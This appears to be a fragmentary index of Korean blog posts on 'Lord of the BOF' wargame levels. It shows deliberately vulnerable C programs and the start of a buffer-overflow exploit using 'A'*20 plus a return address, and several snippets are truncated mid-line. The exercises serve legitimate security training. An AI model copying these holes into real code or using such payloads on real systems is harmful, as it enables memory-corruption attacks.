12345678910111213141516171819202122232425262728293031323334/* The Lord of the BOF : The Fellowship of the BOF - orc - egghunter*/ #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc

123456789101112/* The Lord of the BOF : The Fellowship of the BOF - goblin - small buffer + stdin*/ int main(){ char buffer[16]; gets(buffer); printf("%s\n", buffer);}Colored by Color Scriptercs gremlin과 버퍼 사이즈는 같고, 이제 argv에 받지 않고 gets로 직접 입력받는다.[BUFFER(16)][SFP(4)][RET(4)] 이므로 "A"*20+&SHELL 하면 쉘을 딸 수 있을것이다.gate와 같이 에그쉘을 사용했다. 12345[cobolt@localhost cobolt]$ (python -c 'print "A"*20+"\xa6\xfa\xf..

12345678910111213141516/* The Lord of the BOF : The Fellowship of the BOF - cobolt - small buffer*/ int main(int argc, char *argv[]){ char buffer[16]; if(argc

1234567891011121314151617/* The Lord of the BOF : The Fellowship of the BOF - gremlin - simple BOF*/ int main(int argc, char *argv[]){ char buffer[256]; if(argc